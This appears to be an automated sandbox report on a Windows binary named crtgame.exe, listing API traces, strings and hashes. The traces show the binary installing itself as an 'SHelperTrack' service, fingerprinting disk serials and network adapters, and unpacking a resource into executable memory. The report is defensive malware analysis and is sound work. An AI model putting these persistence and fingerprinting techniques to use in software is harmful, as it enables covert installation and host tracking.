                                                                                    • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                    • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                                    • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                    • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                                    Execution Graph

                                                                                    Execution Coverage:16.7%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:12.1%
                                                                                    Total number of Nodes:437
                                                                                    Total number of Limit Nodes:7
                                                                                    execution_graph: rendered as an interactive node/edge diagram in the original report; the serialized node list was extracted as one run of "node address [API …] edge" tokens and is not reproduced here. Recoverable paths, by function address and the APIs the graph attributes to each node:
                                                                                    • Entry 403002 GetVersion → CRT start-up (HeapCreate, GetCommandLineA, GetStartupInfoA, GetModuleHandleA) → 4026ee GetModuleHandleA GetModuleFileNameA → 40273a GetCommandLineW CommandLineToArgvW GetLocalTime
                                                                                    • Argument dispatch: 402774 / 4027eb / 40289a lstrcmpiW; 4027ba CreateFileA CloseHandle ExitProcess; 402810 and 4028ac RegCreateKeyExA → 402848 / 4028e0 GetTickCount wsprintfA RegSetValueExA RegCloseKey; 40292d SetEvent CreateThread WaitForSingleObject ExitProcess; 402959 StartServiceCtrlDispatcherA
                                                                                    • Install routine 402546 → 402574 GetModuleHandleA GetModuleFileNameA → 4025d9 GetModuleHandleA GetModuleFileNameW RegOpenKeyExA → 402614 RegQueryValueExA → 40263e RegCloseKey → 40265e CreateDirectoryA → 402686 CopyFileA → 40269c OpenSCManagerA → 4026ad CreateServiceA → 4026cb / 4026db CloseServiceHandle
                                                                                    • Host fingerprinting 401a1d: 401a58 CreateFileA → 401aa1 DeviceIoControl → 401b17 GetLastError → 401b43 CloseHandle; 401b54 LoadLibraryA → 401b77 GetProcAddress → 401b9e GetAdaptersInfo → 401c21 FreeLibrary; 401c5b GetWindowsDirectoryA → 401c7e CreateFileA → 401ca2 GetFileTime CloseHandle
                                                                                    • Worker thread 40234f: 402360 WaitForSingleObject → 401ffb FindResourceA → 40201d GetLastError SizeofResource → 40203d LoadResource LockResource GlobalAlloc → 402092 GetTickCount → 40209c GlobalAlloc; 4021c6 VirtualAlloc → 402293 GetLastError LoadLibraryExA / 4022dc GetProcAddress; 4023af Sleep, 402331 Sleep
                                                                                    • Service entry 402426 RegisterServiceCtrlHandlerA → 402457 SetServiceStatus GetLastError CreateEventA → 4024d0 SetServiceStatus CreateThread WaitForSingleObject CloseHandle → 402536 SetServiceStatus; control handler 4023d1 → 4023e3 GetLastError SetServiceStatus SetEvent
                                                                                    • Remaining nodes are CRT internals (heap, environment strings, locale, string-type and LCMapString helpers, RtlUnwind, UnhandledExceptionFilter, TerminateProcess/ExitProcess).

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402712
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 00402729
                                                                                    • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402746
                                                                                    • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274D
                                                                                    • GetLocalTime.KERNEL32(0040C258,?,00000000), ref: 0040275A
                                                                                    • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277C
                                                                                    • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027C9
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D0
                                                                                    • ExitProcess.KERNEL32 ref: 004027D7
                                                                                    • lstrcmpiW.KERNEL32(?,00409110,?,00000000), ref: 004027F9
                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\SVGAHelper,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 00402828
                                                                                    • GetTickCount.KERNEL32 ref: 0040284B
                                                                                    • wsprintfA.USER32 ref: 00402863
                                                                                    • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402886
                                                                                    • RegCloseKey.KERNELBASE(?), ref: 0040288F
                                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040295D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                                    • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$SHelperTrack$SHelperTrack$Software\SVGAHelper$sht1206%d$sht1207%d$test
                                                                                    • API String ID: 99468869-2721247305
                                                                                    • Opcode ID: 56f4d052c141ab9e6f25ea2b185a745dcb3328293780e367d610730049fd8f39
                                                                                    • Instruction ID: 9f47e9fa039345968f7117780ad612f26cc73013d3b62508480a4564cf6a7c99
                                                                                    • Opcode Fuzzy Hash: 56f4d052c141ab9e6f25ea2b185a745dcb3328293780e367d610730049fd8f39
                                                                                    • Instruction Fuzzy Hash: BA6110B1900209FFEB10ABA09E8DFAF7B6CEB04344F10457AB645F21D1DB784D588B68

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,7591F360,00000000), ref: 00402580
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,7591F360,00000000), ref: 00402587
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360), ref: 004025E8
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 004025EF
                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402606
                                                                                    • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SHelperTrack\SHelperTrack.exe,?), ref: 00402630
                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 00402641
                                                                                    • CreateDirectoryA.KERNELBASE(C:\ProgramData\SHelperTrack\SHelperTrack.exe,00000000), ref: 00402663
                                                                                    • CopyFileA.KERNEL32(?,C:\ProgramData\SHelperTrack\SHelperTrack.exe,00000000), ref: 00402692
                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A0
                                                                                    • CreateServiceA.ADVAPI32(00000000,SHelperTrack,SHelperTrack,000F01FF,00000010,00000002,00000001,C:\ProgramData\SHelperTrack\SHelperTrack.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C1
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 004026CE
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E2
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                                    • String ID: .exe$C:\ProgramData\SHelperTrack\SHelperTrack.exe$Common AppData$SHelperTrack$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                    • API String ID: 3461818117-2502623774
                                                                                    • Opcode ID: 13715eb351cd6c70e00849861dd2f03c5aaea0087d691cbf5b036631445e3641
                                                                                    • Instruction ID: d526ef41eebe8d1c9ee91373e78b86e4f875a97381db2fef2651b379f2dad033
                                                                                    • Opcode Fuzzy Hash: 13715eb351cd6c70e00849861dd2f03c5aaea0087d691cbf5b036631445e3641
                                                                                    • Instruction Fuzzy Hash: B74182B1940218BBDB106BA1DF8EE9F7A7CEF45748F00047AB644B10D2DBB94D448AAC

Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
• GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
• FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
Strings
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Library$AdaptersAddressFreeInfoLoadProc
• String ID: GetAdaptersInfo$iphlpapi.dll$o
• API String ID: 514930453-3667123677
• Opcode ID: 89f595ccf776b440989b864168dac3f9ad1edd299b79c39a084b6ecbd17e9917
• Instruction ID: 07c40c0b436640c841799373c8e41aaef243d15379a275d75ad88497ffb5d957
• Opcode Fuzzy Hash: 89f595ccf776b440989b864168dac3f9ad1edd299b79c39a084b6ecbd17e9917
• Instruction Fuzzy Hash: 0E21A770900209AFDF219BA5CD447EFBBB8EF41344F1440BAD504B22E1E7789E85CB69

Control-flow Graph

APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
• DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
• GetLastError.KERNEL32 ref: 00401B17
• CloseHandle.KERNELBASE(?), ref: 00401B46
Strings
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: CloseControlCreateDeviceErrorFileHandleLast
• String ID: \\.\PhysicalDrive0
• API String ID: 4026078076-1180397377
• Opcode ID: 1cfa54963423ccb6de0497cca80913006299f85b3fc9f197ef1958e0eec48844
• Instruction ID: 868ec34f3df53846a82942ba312037215340139e482717fb2ff40e0043273f54
• Opcode Fuzzy Hash: 1cfa54963423ccb6de0497cca80913006299f85b3fc9f197ef1958e0eec48844
• Instruction Fuzzy Hash: DE315C71D00118EADB21AF95DD849EFBBB9EF80750F20817AE514B22A0E7785E45CF98

Control-flow Graph

APIs
• GetVersion.KERNEL32 ref: 00403028
  • Part of subcall function 004037EE: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403061,00000000), ref: 004037FF
  • Part of subcall function 004037EE: HeapDestroy.KERNEL32 ref: 0040383E
• GetCommandLineA.KERNEL32 ref: 00403076
• GetStartupInfoA.KERNEL32(?), ref: 004030A1
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004030C4
  • Part of subcall function 0040311D: ExitProcess.KERNEL32 ref: 0040313A
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
• String ID:
• API String ID: 2057626494-0
• Opcode ID: 74d03af8937ab966108a033b29af4d68479ef1804e35821151968a48ed606fbd
• Instruction ID: 2fe00f1ba1adaf8205d5c113529bd3f59b30330f25e837ab47a4da163d052dde
• Opcode Fuzzy Hash: 74d03af8937ab966108a033b29af4d68479ef1804e35821151968a48ed606fbd
• Instruction Fuzzy Hash: 97217CF0940614EADB14EFA6DE85A6E7BA9EF45714F10023EF501BB2D1DB7C4900CA98

Control-flow Graph

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
• CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
• GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
• CloseHandle.KERNEL32(00000000), ref: 00401CB1
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: File$CloseCreateDirectoryHandleTimeWindows
• String ID:
• API String ID: 87451460-0
• Opcode ID: 93c530355d9a491392339dfd9c54abbb5d3981132c02f10e563fc8c5a833d3f6
• Instruction ID: ce0d93df2b96caaa30ac4b808da5b0a14f13b17a645efb0ba923654cecfefb73
• Opcode Fuzzy Hash: 93c530355d9a491392339dfd9c54abbb5d3981132c02f10e563fc8c5a833d3f6
• Instruction Fuzzy Hash: 32F0E27660021077E62057359E8DFCB3A6C8BC6B60F010139BFC9F21D0DAB48549C6B4

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(?,?,004046FA,?,00000000,00000000,004030D9,00000000,00000000), ref: 0040471F
• TerminateProcess.KERNEL32(00000000,?,004046FA,?,00000000,00000000,004030D9,00000000,00000000), ref: 00404726
• ExitProcess.KERNEL32 ref: 004047A0
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: ddcd27b6cf442a4cf1ad30eb50297e1ec77499e0fa85d3c8b09b97d5a0756837
• Instruction ID: 14ec98fc88cf18415eef0b27452b8b63013d8e7584821c4302456c35a525c8ab
• Opcode Fuzzy Hash: ddcd27b6cf442a4cf1ad30eb50297e1ec77499e0fa85d3c8b09b97d5a0756837
• Instruction Fuzzy Hash: 1C01D6B5140311EEDA20AF24FEC4A1A7BA9EBD1750B11013FFA80B31E1C7786984C66D

Control-flow Graph

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00403061,00000000), ref: 004037FF
  • Part of subcall function 004036A6: GetVersionExA.KERNEL32 ref: 004036C5
• HeapDestroy.KERNEL32 ref: 0040383E
  • Part of subcall function 0040384B: HeapAlloc.KERNEL32(00000000,00000140,00403827,000003F8), ref: 00403858
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: 218b6dc03d2ab9838becf9bac36a4874602e6cf4ce8e7c23e6badea129053baa
• Instruction ID: 94dbf082b7a3c1bc0364f6fd3295f8753e005faaa9027e695ed7ca1b1aaa4fc2
• Opcode Fuzzy Hash: 218b6dc03d2ab9838becf9bac36a4874602e6cf4ce8e7c23e6badea129053baa
• Instruction Fuzzy Hash: 42F0E53260420199EB20BF316E427263DC8AB84B83F10887BF541F85E1EB7887818909

Control-flow Graph

APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(SHelperTrack,Function_000023D1), ref: 00402434
• SetServiceStatus.ADVAPI32(0040C398), ref: 00402493
• GetLastError.KERNEL32 ref: 00402495
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A2
• GetLastError.KERNEL32 ref: 004024C3
• SetServiceStatus.ADVAPI32(0040C398), ref: 004024F3
• CreateThread.KERNEL32(00000000,00000000,Function_0000234F,00000000,00000000,00000000), ref: 004024FF
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402508
• CloseHandle.KERNEL32 ref: 00402514
• SetServiceStatus.ADVAPI32(0040C398), ref: 0040253D
Strings
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
• String ID: SHelperTrack
• API String ID: 3346042915-857109786
• Opcode ID: 4fc3d0daeda22bca5ef77fad7c59bb9e09566fd46082fe623e30784e4ccbe48d
• Instruction ID: 1fd61b723b603eea0553bdbdabdd14e5a5d5d25f9658a13dc72339bd9551936d
• Opcode Fuzzy Hash: 4fc3d0daeda22bca5ef77fad7c59bb9e09566fd46082fe623e30784e4ccbe48d
• Instruction Fuzzy Hash: DF21B4B0821204EFD2109F16FF89917BEA8EB96754B11923FE905B62B1CBB90454CF6D

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004052B1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040857C,?,004085CC,?,?,?,Runtime Error!Program: ), ref: 0040662C
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406644
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406655
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406662
Strings
Memory Dump Source
• Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
• Opcode ID: 89fd29c83fe0656f9344de68875189ac262eb9b27d5f8afccbb55a3c33680799
• Instruction ID: 9d2b8c9d35e922798993d531f446e6b2e7a25ca1052a85fc7f6406c465d5e1cc
• Opcode Fuzzy Hash: 89fd29c83fe0656f9344de68875189ac262eb9b27d5f8afccbb55a3c33680799
• Instruction Fuzzy Hash: 98012171601301EFC7209FB59EC0D2B3AE89B98B803161D3EF545F32A1DA7A9811DB6C

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 376 4068f7-406925 377 406927-406941 LCMapStringW 376->377 378 40696d-406970 376->378 379 406943-406949 377->379 380 40694b-40695d LCMapStringA 377->380 381 406982-40698a 378->381 382 406972-40697f call 406b1b 378->382 379->378 383 406963 380->383 384 406a85 380->384 386 4069a9-4069ac 381->386 387 40698c-4069a4 LCMapStringA 381->387 382->381 383->378 388 406a87-406a98 384->388 386->384 389 4069b2-4069b5 386->389 387->388 391 4069b7-4069bc 389->391 392 4069bf-4069e3 MultiByteToWideChar 389->392 391->392 392->384 393 4069e9-406a1d call 402db0 392->393 393->384 397 406a1f-406a36 MultiByteToWideChar 393->397 397->384 398 406a38-406a51 LCMapStringW 397->398 398->384 399 406a53-406a57 398->399 400 406a99-406acf call 402db0 399->400 401 406a59-406a5c 399->401 400->384 408 406ad1-406ae7 LCMapStringW 400->408 403 406a62-406a65 401->403 404 406b14-406b16 401->404 403->384 406 406a67-406a7f LCMapStringW 403->406 404->388 406->384 406->404 408->384 409 406ae9-406aee 408->409 410 406af0-406af2 409->410 411 406af4-406af7 409->411 412 406afa-406b0e WideCharToMultiByte 410->412 411->412 412->384 412->404
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00408648,00000001,00000000,00000000,00000103,00000001,00000000,?,00405F95,00200020,00000000,?,00000000,00000000), ref: 00406939
                                                                                    • LCMapStringA.KERNEL32(00000000,00000100,00408644,00000001,00000000,00000000,?,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 00406955
                                                                                    • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405F95,?,00000103,00000001,00000000,?,00405F95,00200020,00000000,?,00000000,00000000), ref: 0040699E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405F95,00200020,00000000,?,00000000,00000000), ref: 004069D6
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405F95,00200020,00000000,?,00000000), ref: 00406A2E
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405F95,00200020,00000000,?,00000000), ref: 00406A44
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00405F95,00000000,00405F95,?,?,00405F95,00200020,00000000,?,00000000), ref: 00406A77
                                                                                    • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405F95,00200020,00000000,?,00000000), ref: 00406ADF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 352835431-0
                                                                                    • Opcode ID: 4deab49c664ae0a21811bd24cb8222142d3b12e2d815f637103256df17c70743
                                                                                    • Instruction ID: 59052ec96fa6e9b6a1b06c9b0af0f1045741597cf286c582b0c53739a6d86081
                                                                                    • Opcode Fuzzy Hash: 4deab49c664ae0a21811bd24cb8222142d3b12e2d815f637103256df17c70743
                                                                                    • Instruction Fuzzy Hash: 5B518E71A00209EFCF219F94CE45E9F7BB5FB49750F11412AF916B12A0C73A8921DFA9

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 413 40518d-40519b 414 4051a0-4051a2 413->414 415 4051a4-4051ad 414->415 416 4051af-4051bb 414->416 415->414 415->416 417 4051c1-4051c9 416->417 418 4052dd-4052df 416->418 419 4052b7-4052d7 call 402d30 GetStdHandle WriteFile 417->419 420 4051cf-4051d1 417->420 419->418 421 4051e0-4051e6 420->421 422 4051d3-4051da 420->422 421->418 424 4051ec-405202 GetModuleFileNameA 421->424 422->419 422->421 426 405204-405216 call 402e60 424->426 427 405217-40522f call 402d30 424->427 426->427 432 405231-405257 call 402d30 call 4066b0 427->432 433 40525a-4052b5 call 402e60 call 402e70 * 3 call 40661a 427->433 432->433 433->418
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 004051FA
                                                                                    • GetStdHandle.KERNEL32(000000F4,0040857C,00000000,?,00000000,00000000), ref: 004052D0
                                                                                    • WriteFile.KERNEL32(00000000), ref: 004052D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                    • API String ID: 3784150691-4022980321
                                                                                    • Opcode ID: 87f33cabc0c00aa0fec26d50226044fc56a9d7efbac7f10a8d9899958e493da2
                                                                                    • Instruction ID: 22c9936ad7e37c61766cc13472e3efefc26ac9c2eba3d4c5ea0e4eac7f932d77
                                                                                    • Opcode Fuzzy Hash: 87f33cabc0c00aa0fec26d50226044fc56a9d7efbac7f10a8d9899958e493da2
                                                                                    • Instruction Fuzzy Hash: 4831D472A402186EDF20A660CE49F9B736CEF85304F1404BFF445F61C1EABC9A848E5D
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404CBF
                                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404CD3
                                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404CFF
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403086), ref: 00404D37
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403086), ref: 00404D59
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403086), ref: 00404D72
                                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404D85
                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404DC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1823725401-0
                                                                                    • Opcode ID: d9234cf3cbcc751796c88370d915bd9edf31e3da9d5f2c50eb19383ce1c8816a
                                                                                    • Instruction ID: 0a577491b400eb6cbb59326f85be9cf7e6af23b6261f68aea654aba62c190591
                                                                                    • Opcode Fuzzy Hash: d9234cf3cbcc751796c88370d915bd9edf31e3da9d5f2c50eb19383ce1c8816a
                                                                                    • Instruction Fuzzy Hash: C3318EF25142266FD7203BB45D8483B769DEEC9358716063FEB82F32C1EA394C4552AD
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(?,0000000A,00000000), ref: 00402011
                                                                                    • GetLastError.KERNEL32 ref: 0040201D
                                                                                    • SizeofResource.KERNEL32(00000000), ref: 0040202A
                                                                                    • LoadResource.KERNEL32(00000000), ref: 00402044
                                                                                    • LockResource.KERNEL32(00000000), ref: 0040204B
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402056
                                                                                    • GetTickCount.KERNEL32 ref: 00402092
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004020F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                    • String ID:
                                                                                    • API String ID: 564119183-0
                                                                                    • Opcode ID: 090f4e76fc33472d0f60b8a6e5b7169ee354eea33370b3ef473bc2f44cf863c8
                                                                                    • Instruction ID: 872a1ff13b40b7df4e57b26522b35ed74ba0e7314c9dbe1ae4f604b1d6e81ef5
                                                                                    • Opcode Fuzzy Hash: 090f4e76fc33472d0f60b8a6e5b7169ee354eea33370b3ef473bc2f44cf863c8
                                                                                    • Instruction Fuzzy Hash: 85312C71A00245ABDB115BB99F98AAF7F68EB49344B10803AFA81F72C1CA748945C768
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,759230D0), ref: 004021E3
                                                                                    • GetLastError.KERNEL32 ref: 00402298
                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 004022A5
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004022E0
                                                                                    • Sleep.KERNEL32(000003E8), ref: 00402336
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
